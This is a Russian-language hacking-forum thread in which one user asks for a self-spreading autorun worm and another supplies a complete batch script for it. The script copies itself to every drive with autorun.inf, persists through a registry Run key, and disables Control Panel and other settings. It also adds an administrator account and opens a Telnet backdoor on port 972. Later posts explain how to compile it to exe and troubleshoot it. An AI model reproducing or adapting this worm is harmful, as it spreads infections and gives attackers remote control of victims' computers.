CASINOJOY - Ставка На Успех! Проверь Свою Удачу!


Нажмите CTRL-D чтобы добавить нас в закладки
HackZone.RU - Autorun черви
Войти / Регистрация / Участники
Определение даты выпуска iPhone по серийному номеру
-
Поиск по сайту
Форумы



Реклама

Взлом и безопасность / Новичкам RSS подписка на сообщения с форума Subscribe
Для тех, кто не знает с чего начать. Темы "Хочу стать хакером" удаляются, авторам предупреждение ибо читайте раздел "Статьи"

Новая тема Наиболее обсуждаемые темы Наиболее посещаемые темы
Поиск 
Период
Перейти

Просмотров - 3739
Autorun черви
Добавить этот топик в закладки »
RSS-лента ответов »Subscribe
Lourens007




Scum of Society
# | Сообщение добавлено 13.04.2010 00:27:26
Вот такой вопрос...
Можно ли создать autorun червя на языке командной строки, чтобы он копировал сам себя на все носители (съемные, жесткие), был скрытым, и вообще выполнял все функции autorun...
 
Если можно, то пожалуйста приведите пример кода самого батника и autorun.inf...
Сказать спасибо Ответить Цитировать

misterhacker




Novice
# | Сообщение добавлено 13.04.2010 15:59:51
Отредактировано 13.04.2010 17:22:17 by superhacker
Text
@Echo off
copy ""%0"" "%SystemRoot%\system32\ControlF.exe"
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ControlF" /t REG_SZ /d "%SystemRoot%\system32\ControlF.exe" /f
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoControlPanel /t REG_DWORD /d 1 /f
attrib +r +s "%SystemRoot%\system32\ControlF.exe"
cls
attrib -r -a -s -h B:\autorun.inf
echo [autorun] > B:\autorun.inf
echo open=B:\ControlF.exe >> B:\autorun.inf
copy %0 B:\ControlF.exe
cls
copy %0 C:\ControlF.exe
copy %0 D:\ControlF.exe
cls
attrib -r -a -s -h E:\autorun.inf
echo [autorun] > E:\autorun.inf
echo open=E:\ControlF.exe >> E:\autorun.inf
copy %0 E:\ControlF.exe
cls
attrib -r -a -s -h F:\autorun.inf
echo [autorun] > F:\autorun.inf
echo open=F:\ControlF.exe >> F:\autorun.inf
copy %0 F:\ControlF.exe
cls
attrib -r -a -s -h G:\autorun.inf
echo [autorun] > G:\autorun.inf
echo open=G:\ControlF.exe >> G:\autorun.inf
copy %0 G:\ControlF.exe
cls
attrib -r -a -s -h H:\autorun.inf
echo [autorun] > H:\autorun.inf   
echo open=H:\ControlF.exe >> H:\autorun.inf
copy %0 H:\ControlF.exe
cls
attrib -r -a -s -h I:\autorun.inf
echo [autorun] > I:\autorun.inf
echo open=I:\ControlF.exe >> I:\autorun.inf
copy %0 I:\ControlF.exe
cls
attrib -r -a -s -h K:\autorun.inf
echo [autorun] > K:\autorun.inf
echo open=K:\ControlF.exe >> K:\autorun.inf 
copy %0 K:\ControlF.exe
cls
if exist C:\WINDOWS\Откат.txt goto end2
if exist c:\1.reg goto 1
echo Windows Registry Editor Version 5.00 > c:\1.reg
echo [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] >> c:\1.reg
echo "NoThemesTab"=dword:00000001 >> c:\1.reg
:1
REGEDIT /S C:\1.reg
cls
if exist c:\2.reg goto 2
echo Windows Registry Editor Version 5.00 > c:\2.reg
echo [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] >> c:\2.reg
echo "NoDispSettingsPage"=dword:00000001 >> c:\2.reg
:2
REGEDIT /S C:\2.reg
cls
if exist c:\3.reg goto 3
echo Windows Registry Editor Version 5.00 > c:\3.reg
echo [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] >> c:\3.reg
echo "NoDispBackgroundPage"=dword:00000001 >> c:\3.reg
:3
REGEDIT /S C:\3.reg
cls
if exist c:\4.reg goto 4
echo Windows Registry Editor Version 5.00 > c:\4.reg
echo [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Uninstall] >> c:\4.reg
echo "NoAddRemovePrograms"=dword:00000001 >> c:\4.reg
:4
REGEDIT /S C:\4.reg
copy %0 C:\Восстановление системы.exe
if exist C:\WINDOWS\Откат.txt goto end
 
chcp 1251
net user SUPPORT_388945a0 /delete
net user Mister Hack /add
net localgroup Администраторы hacker /add
net localgroup Пользователи SUPPORT_388945a0 /del
regedit /s conf.reg
sc config tlntsvr start= auto
tlntadmn config port=972 sec=-NTLM
net start Telnet
:end
@Echo on
exit
 
Всё в bat потом в exe

 
Сказать спасибо Ответить Цитировать

Lourens007




Scum of Society
# | Сообщение добавлено 13.04.2010 16:38:38
Как я понял, весь этот код надо компилировать в .ехе (quick batch file compiler), c "ghost application"? Файл autorun.inf будет создаваться автоматически через "echo" а как тогда нужно назвать сам компилированный .ехе?
 
Добавлено 13.04.2010 17:01:31 (через 23 минуты 54 секунды )
 
А причем здесь telnet?
Или авторское право?:-)
Сказать спасибо Ответить Цитировать

Lourens007




Scum of Society
# | Сообщение добавлено 13.04.2010 18:52:26
Так, полностью разобрался, с этим кодом. Спасибо большое.
Сказать спасибо Ответить Цитировать

misterhacker




Novice
# | Сообщение добавлено 13.04.2010 20:59:13
Отредактировано 13.04.2010 21:05:22 by superhacker
Ну вообще имя виря должно быть ControlF.bat, но если делаешь в exe нужно в файле изменить все: ControF.bat на ControlF.exe ,
иначе вирь правильно работать не будет!
Я добавил Телнет на всякий случай!
       Удачи!
 

 
Сказать спасибо Ответить Цитировать

Lourens007




Scum of Society
# | Сообщение добавлено 14.04.2010 08:21:57
Это понятно. Я дополнительно прописал добавление файла "autorun.inf" на разделы "C:\" и "D:\", так же добавил атрибуты "attrib +s +h" для самого червя и .inf. Но вот в чем проблема:  в код я так же добавил запуск приложения "start %myfiles%\..........exe", но оно не хочет запускаться, пишет, что требуемый файл занят процессом.
Что можно сделать?
Сказать спасибо Ответить Цитировать

misterhacker




Novice
# | Сообщение добавлено 14.04.2010 19:32:07
Отредактировано 14.04.2010 20:44:46 by superhacker
Даж не знаю! Может на файле какие-нибудь ограничение! И насчёт атрибутов: скрытый лучше не ставить, а то ён тупы и не находит сам себя, ну это с bat расширением!
 


 
Сказать спасибо Ответить Цитировать


Только зарегистрированные пользователи могут оставлять сообщения в форуме

Зарегистрироваться *** Авторизоваться

 Последние новости и статьи  Последние сообщения с форумов
  • Хакеры взломали украинские правительственные сайты
  • Уязвимость на diia.gov.ua
  • Опубликован бесплатный дешифратор для вымогателя BlackByte
  • Zerodium покупает уязвимости в ExpressVPN, NordVPN и Surfshark
  • За взломом сайтов REvil стояли правоохранительные органы
  • Уязвимость ProxyToken позволяет воровать почту через Microsoft Ex...
  • T-Mobile взломали через уязвимый роутер
  • Ботнет Phorpiex прекратил работу, его исходный код выставлен на п...
  • Критическая уязвимость в Cosmos DB
  • Исследователи научились обходить PIN-коды для карт Mastercard и M...

    Все новости... Все статьи... Прислать новость RSS
  • Разное / Болталка » Re: Форум жив?
  • Разное / Болталка » Форум жив?
  • Разное / Болталка » С Новым 2022 Годом!
  • Взлом и безопасность / Программы » Re: Hasp ключ для ABC-4
  • Портал / Отзывы и предложения » Предлагаем партнерство вашему форуму.
  • Разное / Предложения работы » взлом почты
  • Разное / Предложения работы » Сервис Postman - 500 руб за получение писем и 10€ за пересыл...
  • Разное / Предложения работы » Re: Нужен Взлом сайта на DLE
  • Разное / Предложения работы » Re: Нужен Взлом сайта на DLE
  • Разное / Предложения работы » Re: Нужен Взлом сайта на DLE

    Все форумы... RSS


  • Разместить рекламу
    © HackZone Ltd. 1996-2020. Все права зарегистрированы.
    Перепечатка материалов без согласования и указания источника будет преследоваться по Закону

    О проекте | История проекта | Размещение рекламы | Обратная связь | Правила поведения на портале
    contador de visitas счетчик посещений

    #{title}

    #{text}

    x

    #{title}

    #{text}